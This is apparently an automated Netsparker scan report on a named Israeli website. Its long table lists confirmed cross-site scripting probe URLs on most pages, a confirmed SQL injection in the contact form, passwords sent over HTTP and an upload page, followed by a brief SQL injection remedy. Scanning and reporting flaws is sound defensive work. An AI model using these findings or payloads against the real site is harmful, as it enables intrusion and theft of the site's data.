NETSPARKER SCAN REPORT SUMMARY
TARGET URL: http://www.shalomlaam.co.il/
SCAN DATE: 20 15:41:03 2014
REPORT DATE: 20 16:55:44 2014
SCAN DURATION: 01:12:58
Total Requests: 59131
Average Speed: 13.51 req/sec.
268 identified
158 confirmed
10 critical
95 informational
SCAN SETTINGS
ENABLED ENGINES: Static Tests, Find Backup Files, SQL Injection, Boolean SQL Injection, Blind SQL Injection, Cross-site Scripting, Command Injection, Blind Command Injection, Local File Inclusion, Remote File Inclusion, Remote Code Evaluation, HTTP Header Injection, Open Redirection, Expression Language Injection
Authentication
Scheduled
VULNERABILITIES
CRITICAL 4%
IMPORTANT 57%
MEDIUM 3%
LOW 1%
INFORMATION 35%
VULNERABILITY SUMMARY
URL | Parameter | Method | Vulnerability | Confirmed
/ [Possible]InternalPathLeakage(*nix)
No
/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/2minute/ [Possible]InternalPathLeakage(*nix)
No
/about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/ [Possible]InternalPathLeakage(*nix)
No
/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/Default.asp [Possible]InternalPathLeakage(*nix)
No
/about/reg/ QueryBased
QueryString
Cross-siteScripting Yes
/about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/reg/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/search/ QueryBased
QueryString
Cross-siteScripting Yes
/about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/about/search/default.asp QueryBased
QueryString
Cross-siteScripting Yes
/about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/allvideo/ [Possible]InternalPathLeakage(*nix)
No
/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/ [Possible]InternalPathLeakage(*nix)
No
/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/archive.asp [Possible]InternalPathLeakage(*nix)
No
/alon/Default.asp [Possible]InternalPathLeakage(*nix)
No
/alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/list.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/alon/mador.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/alon/musag.asp [Possible]InternalPathLeakage(*nix)
No
/alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/ rabbi GET Cross-siteScripting Yes
cat GET Cross-siteScripting Yes
search POST Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/answer.asp ProgrammingErrorMessage
No
[Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/ask_rabbi.asp [Possible]InternalPathLeakage(*nix)
No
/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000584)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/Default.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/ask/reg/ QueryBased
QueryString
Cross-siteScripting Yes
/ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/reg/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000642)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/bmidrash/ [Possible]InternalPathLeakage(*nix)
No
/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/bmidrash/answer.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/bprint.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/Default.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/list.asp [Possible]InternalPathLeakage(*nix)
No
/bmidrash/mekorot.asp [Possible]InternalPathLeakage(*nix)
No
/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/Branches/snif.asp [Possible]InternalPathLeakage(*nix)
No
/Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000204)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/ name_id POST SQLInjection Yes
sendFrom POST [Probable]SQLInjection
No
name POST [Probable]SQLInjection
No
phone POST [Probable]SQLInjection
No
subject POST [Probable]SQLInjection
No
f_name POST [Probable]SQLInjection
No
name_id POST [Probable]SQLInjection
No
MSSQLVersionIsOutOfDate
No
MicrosoftSQLServerIdentified
Yes
E-mailAddressDisclosure
No
[Possible]InternalPathLeakage(*nix)
No
/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/Default.asp [Possible]InternalPathLeakage(*nix)
No
/contact/reg/ QueryBased
QueryString
Cross-siteScripting Yes
/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/reg/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000498)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/search/ QueryBased
QueryString
Cross-siteScripting Yes
/contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/contact/search/default.asp QueryBased
QueryString
Cross-siteScripting Yes
/contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004D2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/crossdomain.xml OpenPolicyCrossdomain.xmlIdentified
Yes
/Default.asp [Possible]InternalPathLeakage(*nix)
No
/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gallery/ [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gallery/branches.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/gallery/Default.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gallery/snifim.asp [Possible]InternalPathLeakage(*nix)
No
/gallery/upload_img.asp FileUploadFunctionalityIdentified
Yes
[Possible]InternalPathLeakage(*nix)
No
/gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000445)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000452)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000446)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000455)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000449)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/hagim/ [Possible]InternalPathLeakage(*nix)
No
/hagim/3shavuot.asp [Possible]InternalPathLeakage(*nix)
No
/home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/images/ InternalServerError Yes
/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/images/pagetop.asp QueryBased
QueryString
Cross-siteScripting Yes
/images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E6)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/ ForbiddenResource Yes
/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/+%20win%20+ QueryBased
QueryString
Cross-siteScripting Yes
/js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000409)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/delate_image.asp QueryBased
QueryString
Cross-siteScripting Yes
/js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/getbanner.asp QueryBased
QueryString
Cross-siteScripting Yes
/js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/images/ QueryBased
QueryString
Cross-siteScripting Yes
/js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/top1.htm QueryBased
QueryString
Cross-siteScripting Yes
/js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/js/upload_image.asp QueryBased
QueryString
Cross-siteScripting Yes
/js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/komiks/ [Possible]InternalPathLeakage(*nix)
No
/komiks/Default.asp [Possible]InternalPathLeakage(*nix)
No
/l/ [Possible]InternalPathLeakage(*nix)
No
/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/l/agrala_miadim.asp [Possible]InternalPathLeakage(*nix)
No
/l/agrala_sheelot.asp [Possible]InternalPathLeakage(*nix)
No
/l/agrala_takanon.asp [Possible]InternalPathLeakage(*nix)
No
/l/agrala_tozaot.asp [Possible]InternalPathLeakage(*nix)
No
/l/Default.asp [Possible]InternalPathLeakage(*nix)
No
/lessons/ yom POST [Probable]SQLInjection
No
[Possible]InternalPathLeakage(*nix)
No
/lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/lessons/default.asp yom POST [Probable]SQLInjection
No
[Possible]InternalPathLeakage(*nix)
No
/LIVE/ [Possible]InternalPathLeakage(*nix)
No
/LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/live/form_live.asp [Possible]InternalPathLeakage(*nix)
No
/maillingUpdate.asp QueryBased
QueryString
Cross-siteScripting Yes
/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000210)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/news/ [Possible]InternalPathLeakage(*nix)
No
/news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/news/Default.asp [Possible]InternalPathLeakage(*nix)
No
/page/ [Possible]InternalPathLeakage(*nix)
No
/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pages/ [Possible]InternalPathLeakage(*nix)
No
/pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pages/Default.asp [Possible]InternalPathLeakage(*nix)
No
/pages/page.asp [Possible]InternalPathLeakage(*nix)
No
/pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pagetop.asp [Possible]InternalPathLeakage(*nix)
No
/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pitgam/ [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/pitgam/Default.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/Presentation/ [Possible]InternalPathLeakage(*nix)
No
/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/Presentation/Default.asp [Possible]InternalPathLeakage(*nix)
No
/reg/ email POST [Probable]SQLInjection
No
[Possible]InternalPathLeakage(*nix)
No
/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/reg/Default.asp [Possible]InternalPathLeakage(*nix)
No
/reg/login.asp PasswordTransmittedOverHTTP
Yes
AutoCompleteEnabled
Yes
[Possible]InternalPathLeakage(*nix)
No
/reg/maillingUpdate.asp DatabaseErrorMessage
No
[Possible]InternalPathLeakage(*nix)
No
/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/reg/reg.asp [Possible]InternalPathLeakage(*nix)
No
/scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/search/ [Possible]InternalPathLeakage(*nix)
No
/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/search/default.asp q GET Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/sh/ [Possible]InternalPathLeakage(*nix)
No
/sh/default.asp [Possible]InternalPathLeakage(*nix)
No
/sipur/ [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/sipur/Default.asp [Possible]InternalPathLeakage(*nix)
No
/sipur/page.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/sipur/send_sipur.asp [Possible]InternalPathLeakage(*nix)
No
/site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00029F)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/alon/list.asp CatID GET HTTPHeaderInjection
No
/site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000131)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/ask/ CatID GET HTTPHeaderInjection
No
/site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/ask/answer.asp id GET HTTPHeaderInjection
No
/site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000302)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/ask/answer_print.asp [Possible]InternalPathLeakage(Windows)
No
/site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/answer.asp id GET HTTPHeaderInjection
No
/site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00037E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00033E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/bmidrash/mekorot.asp id GET HTTPHeaderInjection
No
/site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000386)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/ IISVersionDisclosure
No
/site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000123)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C4)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00038E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000397)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000393)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A5)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/pitgam/ CatID GET HTTPHeaderInjection
No
/site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002DC)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000283)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B4)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B1)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/sitemap.xml SitemapIdentified No
/snif.asp QueryBased
QueryString
Cross-siteScripting Yes
/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/tags/ q GET Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
/tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/tags/tags.asp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000573)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/video/ [Possible]InternalPathLeakage(*nix)
No
/video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/video/Default.asp [Possible]InternalPathLeakage(*nix)
No
/vod/ [Possible]InternalPathLeakage(*nix)
No
/vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/vod/vod.asp id GET Cross-siteScripting Yes
[Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E
URI-BASED FullURL Cross-siteScripting Yes
1 TOTAL CRITICAL
CONFIRMED 1
1. SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
